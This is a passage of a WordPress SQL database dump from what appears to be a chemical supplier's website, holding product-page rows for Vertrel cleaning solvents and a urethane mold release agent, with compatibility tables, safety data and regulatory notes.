INSERT INTO `wp_posts` VALUES (2330, 2, '2017-05-11 19:09:15', '2017-05-11 19:09:15', 'Vertrel™ MCA is a proprietary azeotrope of <a href="https://www.miller-stephenson.com/product/vertrel-xf/">Vertrel™ XF</a> hydrofluorocarbon (2,3-dihydrodeca-fluoropentane) with trans-1,2-dichloroethylene. It is ideally suited for use in vapor degreasing equipment. Its enhanced solvency power, compared to <a href="https://www.miller-stephenson.com/product/vertrel-xf/">Vertrel™ XF</a> alone, makes it particularly effective for precision and specialty cleaning with difficult soils.\n\nVertrel™ MCA has zero ozone depletion potential and low global warming potential. It can replace CFC-113, methylchloroform (1,1,1-TCA), hydrochlorofluorocarbons (HCFCs), and perfluorocarbons (PFCs) in many applications. Vertrel MCA is accepted by the U.S. Environmental Protection Agency (EPA) under the Significant New Alternatives Policy (SNAP) program, as a substitute for ozone-depleting substances.\n\n<strong>Cleaning Process</strong>\n\nVapor degreasing should be used for optimum cleaning effectiveness and economy. Modern vapor containment technology is recommended for both batch and in-line equipment. These systems have higher freeboard and a secondary set of low-temperature (–29°C [–20°F]) condenser coils to reduce vapor loss.\n\nVertrel™ MCA has a broad range of cleaning capabilities. Table 1 lists some typical soils readily removed from parts in a short vapor degreasing cycle.\n\nTable 1. Soils Cleaned with Vertrel MCA\n<table width="465">\n<tbody>\n<tr>\n<td width="223">Cutting Oils</td>\n<td width="242">Stamping Oils</td>\n</tr>\n<tr>\n<td>Gear Oils</td>\n<td>Vacuum Oils</td>\n</tr>\n<tr>\n<td>Heavy Greases</td>\n<td>Waxes</td>\n</tr>\n<tr>\n<td>Hydraulic Oils</td>\n<td>Mineral Oils</td>\n</tr>\n</tbody>\n</table>\n<strong>Plastic and Elastomer Compatibility</strong>\n\nVertrel™ MCA is compatible with most polymeric materials commonly encountered in degreasing of precision parts. Acrylic, ABS, and polycarbonate parts, particularly if under stress, may show slight cracking or crazing damage and should be tested. EPDM, butyl rubber, Buna-S, and neoprene are recommended for elastomeric parts.\n\nTables 2 and 3 summarize test results on short-term exposures of unstressed plastics and elastomers simulating a typical cleaning cycle. Long-term compatibility data simulating exposure of vapor degreaser construction materials is available from Miller-Stephenson upon request.\n\n<strong>Table 2.</strong> Plastic Compatibility Immersion: 15 Minutes at Room Temperature\n<table width="465">\n<tbody>\n<tr>\n<td style="text-align: center;" colspan="2" width="465"><strong>Compatible</strong></td>\n</tr>\n<tr>\n<td style="text-align: left;">Polyethylene</td>\n<td style="text-align: left;">Acetal</td>\n</tr>\n<tr>\n<td style="text-align: left;">Polyvinylchloride</td>\n<td style="text-align: left;">Epoxy</td>\n</tr>\n<tr>\n<td style="text-align: left;">Polyester, PET, PBT</td>\n<td style="text-align: left;">Liquid Crystal Polymer</td>\n</tr>\n<tr>\n<td style="text-align: left;">Polyimide, PI, PEI, PAI</td>\n<td style="text-align: left;">Phenolic</td>\n</tr>\n<tr>\n<td style="text-align: left;">Polyetherketone, PEK</td>\n<td>PTFE, ETFE</td>\n</tr>\n<tr>\n<td style="text-align: left;">Polyaryletherketone, PEEK</td>\n<td style="text-align: left;">Chlorinated PVC</td>\n</tr>\n<tr>\n<td style="text-align: left;">Polyarylsulfone, PAS</td>\n<td style="text-align: left;">Ionomer</td>\n</tr>\n<tr>\n<td style="text-align: left;">Polypropylene</td>\n<td style="text-align: left;">ABS</td>\n</tr>\n<tr>\n<td>Polyphenylene Sulfide, PPS</td>\n<td>Polysulfone, PSO</td>\n</tr>\n<tr>\n<td style="text-align: center;" colspan="2"><strong>Incompatible*</strong></td>\n</tr>\n<tr>\n<td>Polystyrene</td>\n<td>Acrylic</td>\n</tr>\n<tr>\n<td>Polyphenylene Oxide, PPO</td>\n<td>Cellulosic</td>\n</tr>\n</tbody>\n</table>\n*Material composition varies depending upon compounding agents, plasticizers, processing, etc. Specific materials should be tested for compatibility with solvent.\n\n<strong>Table 3. </strong>Elastomer Compatibility Immersion: 1 Week at 39°C (102°F)\n<table width="465">\n<tbody>\n<tr>\n<td style="text-align: center;" colspan="2" width="465"><strong>Compatible</strong></td>\n</tr>\n<tr>\n<td>Polysulfide (Thiokol FA)</td>\n<td>EPDM (Nordel®)</td>\n</tr>\n<tr>\n<td>Chlorosulfonated PE</td>\n<td>Butyl Rubber*</td>\n</tr>\n<tr>\n<td>Neoprene*</td>\n<td></td>\n</tr>\n<tr>\n<td style="text-align: center;" colspan="2"><strong>Require Additional Testing</strong></td>\n</tr>\n<tr>\n<td>Buna-N</td>\n<td>Polychloroprene</td>\n</tr>\n<tr>\n<td>Urethane</td>\n<td>Silicone</td>\n</tr>\n<tr>\n<td>Buna-S*</td>\n<td>Natural Rubber</td>\n</tr>\n<tr>\n<td>Fluoroelastomers</td>\n<td></td>\n</tr>\n</tbody>\n</table>\n*Swelling, but with low extractables\n\nElastomer swelling and shrinking will, in most cases, revert to within a few percent of original size after air drying. Swell, shrinkage, and extractables are strongly affected by the compounding agents, plasticizers, and curing used in the manufacture of plastics and elastomers. Therefore, prior in-use testing is particularly important.\n\n<strong>Metals and Other Compatibility</strong>\n\nVertrel™ MCA was found compatible with aluminum, copper, and iron, with and without oil present, after exposure for 2 weeks at 120°C (248°F) in sealed tubes. Contact with highly basic process materials, pH 10 or above, is not recommended.\n\n<strong>Safety/Flammability</strong>\n\nVertrel™ MCA exhibits no closed cup or open cup flash point and is not classified as a flammable liquid by NFPA or DOT. In addition, the product has no vapor flammability limits in air. Flash point data and limits of flammability in air provide the user with additional information that should be used as elements of a fire risk assessment and to determine guidelines for the safe handling of volatile chemicals. Users should ensure compliance with NFPA standards and local fire codes.\n\n<strong>Recovery</strong>\n\nDue to the azeotropic nature of Vertrel MCA, the product is easily recoverable by off-line or in-line distillation equipment, such as a vapor degreaser or still. The presence of soil, however, may alter the characteristics of the material during the recovery operation. Recovery should be closely monitored to ensure operating levels are maintained. Users should test the spent Vertrel MCA to ensure proper classification for waste disposal.\n\n<strong>Environmental Legislation</strong>\n\nVertrel™ specialty fluids have zero ozone depletion potential and low global warming potential (Table 7). They are used as alternatives to CFC-113, methylchloroform, HCFCs, and PFCs in many critical cleaning, drying, carrier fluid, and other high-value specialty uses where reliability is paramount.\n\nVertrel™ MCA is accepted by the EPA under the SNAP program as a substitute for ozone-depleting substances.\n\nThe components of Vertrel™ MCA are listed in the TSCA inventory. One component, HFC-43-10mee, is subject to the Significant New Use Rule (SNUR) and should be used only in the indicated applications. See SDS Regulatory Section.\n\nVertrel™ MCA is not a hazardous air pollutant (HAP) and, therefore, not subject to NESHAP regulation. Vertrel MCA is not included in the SARA Title III Section 313 list of toxic chemicals and is not subject to SARA Title III (EPCRA) reporting requirements.\n\n<a href="https://www.miller-stephenson.com/vertrel-fluids/">To learn more about Vertrel and its ability to remove nPBs please click here. </a>\n\n<a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing/">Click here to learn more about Opteon Sion and vapor degreasing.</a>\n\n&nbsp;\n\n&nbsp;', 'Vertrel™ MCA', 'Vertrel™ MCA has zero ozone depletion potential and low global warming potential. It can replace CFC-113, methylchloroform (1,1,1-TCA), hydrochlorofluorocarbons (HCFCs), and perfluorocarbons (PFCs) in many applications.', 'inherit', 'closed', 'closed', '', '1263-autosave-v1', '', '', '2017-05-11 19:09:15', '2017-05-11 19:09:15', '', 1263, 'https://www.miller-stephenson.com/1263-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2331, 46, '2016-10-06 17:40:47', '2016-10-06 17:40:47', '', '', '', 'publish', 'closed', 'closed', '', '2331', '', '', '2016-10-06 17:40:47', '2016-10-06 17:40:47', '', 0, 'https://www.miller-stephenson.com/nf_sub/2331/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2332, 3, '2016-10-06 17:42:13', '2016-10-06 17:42:13', '', 'PTFE RELEASE AGENT', '', 'inherit', 'closed', 'closed', '', 'ms-136w-145w', '', '', '2016-10-06 17:42:49', '2016-10-06 17:42:49', '', 2312, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/MS-136W-145W.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2333, 0, '2016-10-06 17:57:37', '2016-10-06 17:57:37', '', '', '', 'publish', 'closed', 'closed', '', '2333', '', '', '2016-10-06 17:57:38', '2016-10-06 17:57:38', '', 0, 'https://www.miller-stephenson.com/nf_sub/2333/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2334, 2, '2016-10-06 18:22:58', '2016-10-06 18:22:58', 'Introduction to Vertrel SFR\n\nVertrel SFR is an engineered mixture of nonflammable hydrofluorocarbons (HFCs), trans-1,2-dichloroethylene (t-DCE) and methanol.\n\nVertrel SFR is designed to remove difficult to remove high temperature fluxes used in lead free and no clean solders. It has excellent solvency power for a wide range of soils including ionic soils. The low surface tension and nonflammable properties of Vertrel SFR make it an ideal ultrasonic vapor degreasing solvent.\n\nVertrel SFR is a non-ozone depleter and can replace many solvents such as trichloroethylene (TCE), n-propyl bromide (nPB), HCFC-225 blends, HCFC-141b, HFEs, PFCs, and CFCs. Vertrel SFR can also replace aqueous cleaners where floor space and cleanliness are at a premium.\n\n<strong>Features and Benefits</strong>\n\nVertrel SFR does a good job balancing performance with favorable environmental and worker safety properties.\n<ul>\n 	<li>Excellent solvency power (KB Value&gt;100) to remove organic and ionic contaminants: Superior cleaning performance</li>\n 	<li>Fast drying: Increases productivity</li>\n 	<li>Low surface tension: Able to penetrate and clean tight areas</li>\n 	<li>Compatible with most plastics, elastomers, and metals</li>\n 	<li>Can be used with ultrasonics.</li>\n 	<li>Non flammable</li>\n 	<li>Low toxicity</li>\n 	<li>Zero ozone depletion potential</li>\n 	<li>Low global warming potential</li>\n 	<li>Existing equipment can be used with minor or no modification</li>\n 	<li>No surfactants needed: Residue free cleaning is promoted.</li>\n</ul>\n<strong>Typical Applications</strong>\n<ul>\n 	<li>Defluxing</li>\n 	<li>Oil, grease, and wax removal</li>\n 	<li>Precision Cleaning</li>\n</ul>\n<strong>Specification Conformity Tests</strong>\n\nVertrel SFR has been tested in a variety of industrytests, including:\n\nBoeing D6-17487 Revision P\nSolvent Cleaners; General Cleaning\n\nARP 1755 B\nEffect of Cleaning Agent on Aircraft Engine Materials\n\nDouglas Aircraft Company\nType 1: Materials and Procedures for General Exterior Cleaning of\nPainted and Unpainted Surfaces. (General Purpose Cleaner)\n\n<strong>Environmental Properties</strong>\n\nVertrel SFR has zero ozone depletion potential and low global warming potential.  Vertrel SFR is accepted by the US Environmental Protection Agency under the Significant New Alternatives Policy (SNAP) program as a substitute for ozone-depleting substances (solvent category). It is not SNAP approved for aerosol packages.\n\n<strong>Safety/Flammability/Storage</strong>\n\nData from acute toxicity studies has demonstrated that Vertrel SFR has low toxicity. It has a calculated AEL (Acceptable Exposure Limit) of 187 ppm based on its individual components. AEL is an airborne inhalation exposure limit established by Dupont that specifies time-weighted average concentrations to which nearly all workers may be repeatedly exposed without adverse effects. The calculated AEL is in accordance with ACGIH formulas for TLVs for mixtures. Vertrel SFR is a slight skin and eye irritant and has low acute inhalation toxicity.\n\nPlease refer to the MSDS for information on detailed exposure limits and toxicity-related data.\n\nVertrel SFR exhibits no closed cup or open cup flash point and is not classified as a flammable liquid by NFPA or DOT. The product is volatile, and if allowed to evaporate and mix with air, the vapor may become flammable.\n\nVertrel SFR is thermally stable and does not oxidize or degrade during storage. Store in a clean, dry area. Protect from freezing temperatures. If solvent is stored below –10 °C (14 °F), mix prior to use. Do not allow stored product to exceed 52 °C (125 °F) to prevent leakage or potential rupture of container from pressure and expansion.\n\n<strong>Material Compatibility</strong>\n\nMost metals, plastics and elastomers commonly used for components mounted on printed wiring board assemblies can be safely cleaned with Vertrel SFR. Plastics that may show signs of softening, swelling or other changes include acrylics, ABS and polycarbonate. Elastomers, if affected, will generally revert to within a few percent of original size after air-drying. Prior-to-use, testing of plastics and elastomers should be performed under conditions expected during normal operation (e.g., time in contact with Vertrel SFR, temperature, etc.). For more information on material compatability, contact Miller-Stephenson\n\nContact with highly basic materials, pH 10 and above, is not recommended.\n\nLarge amounts of water may extract the alcohol component of Vertrel SFR, and reduce cleaning performance. Therefore, to reduce alcohol loss, use desiccant dryers rather than water separators in the condensate return line.', 'Vertrel SFR', 'Vertrel SFR specialty fluid can solve your most difficult defluxing needs. Vertrel SFR is an engineered mixture of nonflammable hydrofluorocarbons (HFCs), trans-1, 2-dichloroethlyene (t-DCE) and methanol.\n<br><br />\nVertrel SFR is designed to remove difficult to remove high temperature fluxes used in lead free and no clean solders. It has excellent solvency power for a wide range of soils including ionic soils.', 'inherit', 'closed', 'closed', '', '1276-autosave-v1', '', '', '2016-10-06 18:22:58', '2016-10-06 18:22:58', '', 1276, 'https://www.miller-stephenson.com/1276-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2335, 47, '2016-10-06 18:23:58', '2016-10-06 18:23:58', '', '', '', 'publish', 'closed', 'closed', '', '2335', '', '', '2016-10-06 18:23:58', '2016-10-06 18:23:58', '', 0, 'https://www.miller-stephenson.com/nf_sub/2335/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2336, 48, '2016-10-06 18:26:04', '2016-10-06 18:26:04', '', '', '', 'publish', 'closed', 'closed', '', '2336', '', '', '2016-10-06 18:26:04', '2016-10-06 18:26:04', '', 0, 'https://www.miller-stephenson.com/nf_sub/2336/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2337, 2, '2016-10-06 19:11:33', '2016-10-06 19:11:33', '<strong>Introduction to Vertrel XF</strong>\n\nVertrel XF is a proprietary hydrofluorocarbon fluid with zero ozone depletion potential and low global warming potential ideally suited for use in vapor degreasing equipment for cleaning, rinsing, and drying. It can replace current hydrochlorofluorocarbon (HCFC) and perfluorocarbon (PFC) fluids in most applications.\n\nVertrel XF is HFC 43-10mee or 2,3-dihydrodeca–fluoropentane; empirical formula C5H2F10. It is a clear, colorless liquid with the properties shown in Table 1.\n\nUnique physical properties include a high density, low viscosity, and low surface tension. This combined with nonflammability, chemical and thermal stability, low toxicity, and ease of recovery by distillation make Vertrel XF ideal for a broad range of applications. Solvency is selective, but can be enhanced by use of appropriate azeotropes and blends with alcohols, hydrocarbons, esters, etc..\n\n<strong>Typical Applications</strong>\n<ul>\n 	<li>Cleaning and rinsing agent</li>\n 	<li>Drying fluid</li>\n 	<li>Particulate remover</li>\n 	<li>Fluorocarbon lubricant carrier</li>\n 	<li>Solvent and dispersion media</li>\n 	<li>Heat transfer media</li>\n 	<li>Dielectric fluid</li>\n 	<li>Replacement for many HCFC, PFC, and CFC-113 applications</li>\n</ul>\nVertrel XF is ideally suited for cleaning fine particulate matter (submicron range) from metal and nonmetal parts. Removal of particle contamination requires a solvent that can minimize the thickness of the laminar boundary layer where particles are bonded to the substrate. If the boundary layer thickness is less than the particle diameter, momentum from the flowing solvent can efficiently dislodge the particles and carry them away. Vertrel XF, with its lower viscosity and higher density, results in a thinner boundary layer, which enhances cleaning. Common aqueous cleaning fluids, mixtures of water and detergent, have higher viscosities and lower densities compared to Vertrel XF, making these fluids less efficient.\n\nThe electronic attraction between particle and surface can be overcome further by increasing the polarity of the fluid through the addition of small amounts of alcohols. Chemours offers a series of proprietary azeotrope and blend compositions that exploit this property.\n\nAnother common cleaning technique is the addition of ultrasonics to the solvent. High frequency, ultrasonic waves produce tiny bubbles that form and collapse (cavitate) as the wave passes. Cavitation energy increases with decreasing viscosity, another advantage of Vertrel XF, improving its ability to mechanically dislodge particle contamination.\n\n<strong>Vapor Degreasing Process</strong>\n\nUse of modern vapor containment technology is recommended for both batch and in-line equipment. These systems have higher freeboard and a secondary set of low-temperature (–29°C [–20°F]) condenser coils to greatly reduce vapor losses from boiling solvent degreasing, defluxing, rinsing, and drying equipment.\n\nNeat Vertrel XF can be used for rinsing, drying, and some cleaning applications, but use with other components, such as azeotropes or simple blends, can provide improved solvency and soil removal. Vertrel XF forms azeotropes or constant boiling mixtures with many similar boiling range components. Five nonflammable proprietary azeotrope compositions have been developed that are useful for general, as well as precision, cleaning and defluxing. See specific product bulletins for details.\n\n<strong>Table 1.</strong> Density and Vapor Pressure Change with Temperature\n<table width="662">\n<tbody>\n<tr>\n<td style="text-align: center;" width="250"><strong>Temperature, °C (°F)</strong></td>\n<td style="text-align: center;" width="206"><strong>Density, kg/L</strong></td>\n<td style="text-align: center;" width="206"><strong>Vapor Pressure, atm</strong></td>\n</tr>\n<tr>\n<td style="text-align: center;">-20 (–4)</td>\n<td style="text-align: center;">1.7</td>\n<td style="text-align: center;">0.021</td>\n</tr>\n<tr>\n<td style="text-align: center;">-10 (14)</td>\n<td style="text-align: center;">1.68</td>\n<td style="text-align: center;">0.047</td>\n</tr>\n<tr>\n<td style="text-align: center;">0 (32)</td>\n<td style="text-align: center;">1.66</td>\n<td style="text-align: center;">0.082</td>\n</tr>\n<tr>\n<td style="text-align: center;">10 (50)</td>\n<td style="text-align: center;">1.62</td>\n<td style="text-align: center;">0.143</td>\n</tr>\n<tr>\n<td style="text-align: center;">20 (68)</td>\n<td style="text-align: center;">1.6</td>\n<td style="text-align: center;">0.232</td>\n</tr>\n<tr>\n<td style="text-align: center;">30 (86)</td>\n<td style="text-align: center;">1.57</td>\n<td style="text-align: center;">0.374</td>\n</tr>\n<tr>\n<td style="text-align: center;">40 (104)</td>\n<td style="text-align: center;">1.55</td>\n<td style="text-align: center;">0.571</td>\n</tr>\n<tr>\n<td style="text-align: center;">50 (122)</td>\n<td style="text-align: center;">1.51</td>\n<td style="text-align: center;">0.843</td>\n</tr>\n<tr>\n<td style="text-align: center;">60 (140)</td>\n<td style="text-align: center;">1.49</td>\n<td style="text-align: center;">1.212</td>\n</tr>\n<tr>\n<td style="text-align: center;">70 (158)</td>\n<td style="text-align: center;">1.46</td>\n<td style="text-align: center;">1.695</td>\n</tr>\n<tr>\n<td style="text-align: center;">80 (176)</td>\n<td style="text-align: center;">1.43</td>\n<td style="text-align: center;">2.306</td>\n</tr>\n<tr>\n<td style="text-align: center;">90 (194)</td>\n<td style="text-align: center;">1.4</td>\n<td style="text-align: center;">3.083</td>\n</tr>\n<tr>\n<td style="text-align: center;">100 (212)</td>\n<td style="text-align: center;">1.38</td>\n<td style="text-align: center;">4.042</td>\n</tr>\n<tr>\n<td style="text-align: center;">110 (230)</td>\n<td style="text-align: center;">1.34</td>\n<td style="text-align: center;">5.211</td>\n</tr>\n<tr>\n<td style="text-align: center;">120 (248)</td>\n<td style="text-align: center;">1.32</td>\n<td style="text-align: center;">6.621</td>\n</tr>\n<tr>\n<td style="text-align: center;">130 (266)</td>\n<td style="text-align: center;">1.3</td>\n<td style="text-align: center;">8.301</td>\n</tr>\n</tbody>\n</table>\n<strong>Solvency</strong>\n\nUnlike PFCs, Vertrel XF is completely miscible with most esters, ketones, ethers, ether-alcohols, and the lower alcohols, such as methanol, ethanol, and isopropanol. The lower hydrocarbons, such as hexane and heptane, are also soluble. Neat Vertrel XF has limited solvency for many higher molecular weight materials, such as hydrocarbon oils, silicone oils, waxes, and greases; here combinations with the many readily miscible esters, alcohols, and lower hydrocarbons can enhance solubility and cleaning efficiency. Like CFC-113 and PFCs, Vertrel XF has high solubility for Krytox and “Fomblin” fluorocarbon lubricants and can be used either as an application carrier fluid or to remove them.\n\n<strong>Plastic and Elastomer Compatibility</strong>\n\nA large variety of plastics and elastomers can be safely exposed to Vertrel XF. Tables 2 and 3 summarize test results on short-term exposures of unstressed plastics and elastomers, which simulate a typical cleaning cycle.\n\nLong-term compatibility data simulating exposure of vapor degreaser construction materials is available from Chemours upon request.\n\nElastomer swelling and shrinking will, in most cases, revert to within a few percent of original size after air drying. Swell, shrinkage, and extractables are strongly affected by the compounding agents, plasticizers, and curing used in the manufacture of plastics and elastomers. Therefore, prior in-use testing is particularly important.\n\n<strong>Table 2</strong>. Plastic Compatibility Immersion: 15 Minutes at Room Temperature\n<table width="456">\n<tbody>\n<tr>\n<td style="text-align: center;" colspan="2" width="456"><strong>Compatible</strong></td>\n</tr>\n<tr>\n<td>Polyethylene</td>\n<td>ABS</td>\n</tr>\n<tr>\n<td>Polypropylene</td>\n<td>Acetal</td>\n</tr>\n<tr>\n<td>Polystyrene</td>\n<td>Epoxy</td>\n</tr>\n<tr>\n<td>Polyester, PET, PBT</td>\n<td>Ionomer</td>\n</tr>\n<tr>\n<td>Polyphenylene Oxide, PPO</td>\n<td>Liquid Crystal Polymer</td>\n</tr>\n<tr>\n<td>Polyimide, PI, PEI, PAI</td>\n<td>Phenolic</td>\n</tr>\n<tr>\n<td>Polyetherketone, PEK</td>\n<td>PVC, CPVC</td>\n</tr>\n<tr>\n<td>Polyaryletherketone, PEEK</td>\n<td>PTFE, ETFE</td>\n</tr>\n<tr>\n<td>Polysulfone</td>\n<td></td>\n</tr>\n<tr>\n<td>Polyarylsulfone</td>\n<td></td>\n</tr>\n<tr>\n<td>Polyphenylene Sulfide, PPS</td>\n<td></td>\n</tr>\n<tr>\n<td style="text-align: center;" colspan="2"><strong>Incompatible*</strong></td>\n</tr>\n<tr>\n<td>Acrylic</td>\n<td>Cellulosic</td>\n</tr>\n</tbody>\n</table>\n<strong>Table 3</strong>. Elastomer Compatibility Immersion: 15 Minutes at Room Temperature\n<table width="456">\n<tbody>\n<tr>\n<td colspan="2" width="456">Compatible</td>\n</tr>\n<tr>\n<td>Buna-N, NBR, Nitrile</td>\n<td>Buna-S, SBR, GRS</td>\n</tr>\n<tr>\n<td>Butyl Rubber, IIR</td>\n<td>Chlorosulfonated PE</td>\n</tr>\n<tr>\n<td>EPM, EPDM, Nordel®</td>\n<td>Polysulfide</td>\n</tr>\n<tr>\n<td>Natural Rubber, Isoprene</td>\n<td>Neoprene</td>\n</tr>\n<tr>\n<td>Urethane</td>\n<td>Viton™ B</td>\n</tr>\n<tr>\n<td></td>\n<td>Silicone</td>\n</tr>\n<tr>\n<td colspan="2">Incompatible*</td>\n</tr>\n<tr>\n<td>None Tested</td>\n<td></td>\n</tr>\n</tbody>\n</table>\n*Material composition varies depending upon compounding agents, plasticizers, processing, etc. Specific materials should be tested for compatibility with solvent.\n\n<strong>Metals and Other Compatibility</strong>\n\nVertrel XF is fully compatible with the metals listed below after exposure for two weeks at 100°C (212°F) in sealed tubes with and without water contact.\n<ul>\n 	<li>Zinc*</li>\n 	<li>Stainless Steel</li>\n 	<li>Brass*</li>\n 	<li>Aluminum</li>\n 	<li>Copper*</li>\n</ul>\n*Slight discoloration with water present\n\nVertrel XF is not compatible with strong bases; therefore, contact with highly basic process materials is not recommended.\n\n<strong>Exposure Limits</strong>\n\nData from acute toxicity studies has demonstrated that Vertrel XF has low toxicity. Vertrel XF is a slight skin and eye irritant and has low acute inhalation toxicity.\n\n<strong>Safety/Flammability</strong>\n\nVertrel XF is nonflammable and does not become flammable during boiling or evaporation. It exhibits no closed or open cup flash point and is not classified as a flammable liquid by NFPA or DOT. It is thermally stable to 300°C (572°F) and does not oxidize or degrade during storage.\n\n<strong>Recovery</strong>\n\nVertrel XF is a pure component material and is easily recoverable by off-line and in-line distillation equipment, such as a vapor degreaser or still. The presence of soil, however, may alter the characteristics of the material during the recovery operation. Recovery should be closely monitored to ensure operating levels are maintained. Users should test the spent Vertrel XF to ensure proper classification for waste disposal.\n\n<strong>Storage/Handling</strong>\n\nVertrel XF is thermally stable and does not oxidize or degrade during storage. Store in a clean, dry area. Protect from freezing temperatures. Do not allow stored product to exceed 52°C (125°F) to prevent leakage or\npotential rupture of container from pressure and expansion. Consideration should be given to retrofit of existing or purchase of new, vapor degreasing equipment to provide vapor containment technology that enables safe and economical use of Vertrel XF. Drum pumps are recommended to dispense Vertrel XF from its container. Refer to the Safety Data Sheet (SDS) for specific handling precautions and instructions.\n\n<strong>Environmental Legislation</strong>\n\nVertrel XF has zero ozone depletion potential and a low global warming potential (Table 4). Vertrel XF and its azeotropes and blends are used as alternatives to CFC-113, methylchloroform, HCFCs, and PFCs in many critical cleaning, drying, carrier fluid, and other high-value specialty uses where reliability is paramount.\n\nVertrel XF is accepted by the U.S. Environmental Protection Agency (EPA) under the Significant New Alternatives Policy (SNAP) program as a substitute for ozone-depleting substances. HFC 43-10mee or\ndecafluoropentane is exempt from classification as a volatile organic compound (VOC) by the EPA. Vertrel XF is also VOC compliant under the California South Coast Air Quality Management District (SCAQMD) regulations, which require VOC content less than 50 g/L of solvent.\n\nVertrel XF is listed in the TSCA inventory. It is subject to the Significant New Use Rule (SNUR) and should be used only in the indicated applications. See SDS Regulatory Section.\n\nVertrel XF is not a hazardous air pollutant (HAP), and, therefore, not subject to NESHAP regulation. Spent Vertrel XF is not an RCRA characteristic or listed waste. However, addition of contaminants could change that status. Vertrel XF is not included in the SARA Title III Section 313 list of toxic chemicals and is not subject to SARA Title III (EPCRA) reporting requirements.\n\n<strong>Table 4.</strong> Environmental Properties\n<table width="456">\n<tbody>\n<tr>\n<td width="250"><strong>Property</strong></td>\n<td style="text-align: center;" width="206"><strong>Vertrel XF</strong></td>\n</tr>\n<tr>\n<td>Formula</td>\n<td style="text-align: center;">C5H2F10</td>\n</tr>\n<tr>\n<td>Class</td>\n<td style="text-align: center;">Hydrofluorocarbon (HFC)</td>\n</tr>\n<tr>\n<td>Atmospheric Lifetime, yr</td>\n<td style="text-align: center;">17.1</td>\n</tr>\n<tr>\n<td>Ozone Depletion Potential (ODP)</td>\n<td style="text-align: center;">0</td>\n</tr>\n<tr>\n<td>Global Warming* Potential (GWP/100 yr ITH)</td>\n<td style="text-align: center;">1300</td>\n</tr>\n<tr>\n<td>Volatile Organic Compounds (VOC, g/L)</td>\n<td style="text-align: center;">Exempt</td>\n</tr>\n</tbody>\n</table>\n*IPCC Second Assessment Report (1995)\n\n<strong>Specifications</strong>\n\nComposition and specifications are shown in Table 5. Vertrel™ XF is listed in the TSCA Inventory.\n\n<strong>Table 5.</strong> Vertrel XF Specifications\n<table width="456">\n<tbody>\n<tr>\n<td width="250">Property</td>\n<td style="text-align: center;" width="206">Vertrel™ XF</td>\n</tr>\n<tr>\n<td>Fluoropentanes, wt%</td>\n<td style="text-align: center;">99.9 min.</td>\n</tr>\n<tr>\n<td>Nonvolatile Residue, ppm wt</td>\n<td style="text-align: center;">2.0 max.</td>\n</tr>\n<tr>\n<td>Moisture, ppm wt</td>\n<td style="text-align: center;">50 max.</td>\n</tr>\n<tr>\n<td>Acidity, mg KOH/g</td>\n<td style="text-align: center;">0.01 max.</td>\n</tr>\n<tr>\n<td>Appearance</td>\n<td style="text-align: center;">Clear, Colorless</td>\n</tr>\n</tbody>\n</table>\n<a href="https://www.miller-stephenson.com/vertrel-fluids/">To learn more about Vertel and nPB replacement click here.</a>', 'Vertrel XF', 'A very mild, nonflammable solvent. Excellent compatibility with most plastics. Typical applications include: cleaning and rinsing, drying, particulate removal, fluorocarbon lubricant carrier, heat transfer, oxygen service and replacement for many HCFC and PFC. Removes PTFE release agents. Unique physical properties include a high boiling point and low surface tension. Ideal for a broad range of applications. No ODC (ozone depleting chemicals). NSN 6850-01-460-4914 (Aerosol).', 'inherit', 'closed', 'closed', '', '1278-autosave-v1', '', '', '2016-10-06 19:11:33', '2016-10-06 19:11:33', '', 1278, 'https://www.miller-stephenson.com/1278-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2338, 3, '2017-06-08 18:05:53', '2017-06-08 18:05:53', '<h2>Urethane Mold Release Agent; Solvent-based</h2>\r\n<h3>Superior release ease; Maximize product quality and throughput; High durability and surface slip.</h3>\r\nReleaSys 8900 Urethane Mold Release Agent is a solvent-based, semi-permanent release agents designed to provide superior durability and high slip across a broad range of moldable substrates. This formulation is particularly effective on difficult molding application or abrasive substrates. Ideally suited a Composite and Urethane release agent  Properly applied, our product develops a durable, thin-film on the mold surface with minimal build-up.  ReleaSys 8900 will not interfere with post-production finishing operation. Benefits of this product include:\r\n<ul>\r\n 	<li>Exceptional durability and surface adhesion</li>\r\n 	<li>High Slip;Ideal for complex mold geometries</li>\r\n 	<li>Ideal for Composites and Urethanes</li>\r\n 	<li>Fast evaporation and cure time</li>\r\n 	<li>Minimal mold build up</li>\r\n</ul>\r\nSemi-permanent release agents are state-of-the-art release systems that provide the molding industry with an alternative to the traditional high volume, apply-every-cycle release agent. Miller-Stephenson has developed the ReleaSys product line in an effort to offer a high efficiency, cost-effective, and technologically advanced release agent to our customers. Our semi-permanent release agents forms a chemical bond to the mold surface which results in exceptional surface adhesion, durability, and application efficiency. All variants of the ReleaSys Series will deliver higher productivity, lower rejection rates, and higher quality products even in the most demanding applications. We offer various slip-levels and have specialized formulations for differing polymer types and molding processes ( ie: injection, transfer, compression). Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites, elastomers and organic polymers. ReleaSys 8900 Urethane mold release agent excels particularly as a composite and urethane release agent\r\n<h3>Application Efficient and Cost-Effective</h3>\r\nThe application efficiency of ReleaSys can be seen by the relatively small amounts of semi-permanent mold release agents that needs to be applied to the mold surface to give numerous releases.  This small volume needed means that storage space is reduced and cost per application is minimized. Products are formulated ready-to-use, making dilution equipment redundant. Overall, our mold release agents represent an added-value proposition that can be tailored to many types of molding applications. Miller-Stephenson has spent years improving and tailoring our mold release agents to deliver the highest value proposition by increase efficiency, reducing over-application, and enhancing finished part quality and consistency. Release agents are an integral part of many manufacturing processes. They are often necessary, but are not frequently understood for the value that they can add. Specialty release agents can enhance productivity, extend tool/die/mold life, increase cycle times, improve part/surface quality and reduce scrap and defect rates, just to name a few of the many potential benefits.\r\n\r\n<a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For help with application or troubleshooting concerns while using ReleaSys.</strong></a>\r\n\r\n<strong><a 